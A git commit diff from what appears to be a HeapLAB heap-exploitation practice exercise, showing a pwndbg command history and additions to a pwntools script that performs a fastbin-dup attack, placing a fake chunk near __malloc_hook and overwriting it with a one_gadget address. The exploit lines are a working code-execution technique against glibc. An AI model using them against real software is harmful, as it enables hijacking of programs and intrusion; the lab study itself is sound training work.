modified: HeapLAB/challenge-fastbin_dup/.gdb_history

modified: HeapLAB/challenge-fastbin_dup/bruh.py
2021-01-04 20:25:35 -06:00 · 2021-01-04 20:25:35 -06:00 · 93f5247d9c
commit 93f5247d9c
parent 4c06c05f4e
2 changed files with 71 additions and 66 deletions
--- a/HeapLAB/challenge-fastbin_dup/.gdb_history
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@ -1,68 +1,3 @@
-c
-x 0x7f4854db6b40
-c
-x 0x7f4854db6b40
-x main_arena
-x &main_arena
-x &__malloc_hook
-x main_arena.top
-db main_arena.top
-c
-c
-c
-q
-print __malloc_hook
-print __malloc_hook 
-fastbins
-c
-fastbins
-c
-vis_heap_chunks 
-c
-fastbins
-r
-c
-fastbins
-print main_arena
-vis_heap
-c
-fastbins
-fastbins
-c
-fastbins
-r
-c
- quit
-db main_arena
-db &main_arena.fastbinsY 
-q
-r
-c
-c
-fastbins
-print &main_arena
-print main_arena
-c
-print main_arena
-db main_arena
-db &main_arena
-db &main_arena/100
-db &main_arena 100
-db &main_arena 1000
-q
-db main_arena.bins
-db &main_arena.fastbinsY 
-run
-c
-c
-q
-r
-c
-fastbins
-c
-fastbins
-c
-fastbins
 r
 c
 c
@ -254,3 +189,68 @@ db 0x7f265fd4cb2d-1
 db 
 c
 db &__malloc_hook-(16) (16*8)
+exit
+quit
+x rsp
+print $rsp+50
+print $rsp
+print $*rsp
+print $rsp
+print (void*)$rsp
+print (void*)$rsp+50
+print (void*)*$rsp+50
+print (void*)&$rsp+50
+x 0x7ffc1644e71a
+print (void*)&$rsp+50
+print (void*)$rsp+50
+print (void*)$rsp+0x50
+x 0x7ffc1644e738
+quit
+q
+print main_arena
+find_fake_fast &__malloc_hook
+q
+quit
+fastbins
+find_fake_fast &__malloc_hook 
+print (void*)&__malloc_hook
+q
+x &__malloc_hook
+db &__malloc_hook-(16) (16*8)
+db &__malloc_hook-(16) (17*8)
+db &__malloc_hook-(16) (18*8)
+db &__malloc_hook-(16) (19*8)
+db &__malloc_hook-(16) (20*8)
+quit
+db &__malloc_hook-(16) (20*8)
+db &__malloc_hook-(16) (16*8)
+db &__malloc_hook-(16) (20*8)
+quit
+db &__malloc_hook-(16) (20*8)
+find_fake_fast &__malloc_hook
+db 0x7fd4a6cf7b2d-(16) (20*8)
+q
+print main_arena
+vis_heap_chunks 
+db 0x7f37a78ddb7d-(16) (20*8)
+db 0x7f37a78ddb7d-(32) (20*8)
+quit
+db 0x7f37a78ddb7d-(32) (20*8)
+db main_arena.top-(32) (20*8)
+search 0x7f323f6f0fa1
+search 0x7f323f6f0fa1
+search --help
+search --qword 0x7f323f6f0fa1
+search -p 0x7f323f6f0fa1
+search -p 0x0fa1
+search -p 0xa10f
+search -hexp 0x7f323f6f0fa1
+search --hex 0x7f323f6f0fa1
+search --hex 7f323f6f0fa1
+search --hex -8 7f323f6f0fa1
+search -8 --hex 7f323f6f0fa1
+search -t qword --hex 7f323f6f0fa1
+search -t qword -x 7f323f6f0fa1
+search -t qword -x 0x7f323f6f0fa1
+search -t qword 0x7f323f6f0fa1
+quit
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@ -74,9 +74,14 @@ malloc(119, 'sdfg')

 #8 * 9

-payload_loc = libc.sym.__malloc_hook - 35
+payload_loc = libc.sym.__malloc_hook - 35 #definetly the right thing
 malloc(119, p64(0)*9 + p64(payload_loc))

+#we now have things in place and shit
+onegadget = libc.address + 0xe1fa1
+malloc(72, p64(0)*(35) + p64(onegadget))
+
+print("onegadget: {}".format(hex(onegadget)))
 print("top chunk addr: {}".format(hex(payload_loc)))

 # =============================================================================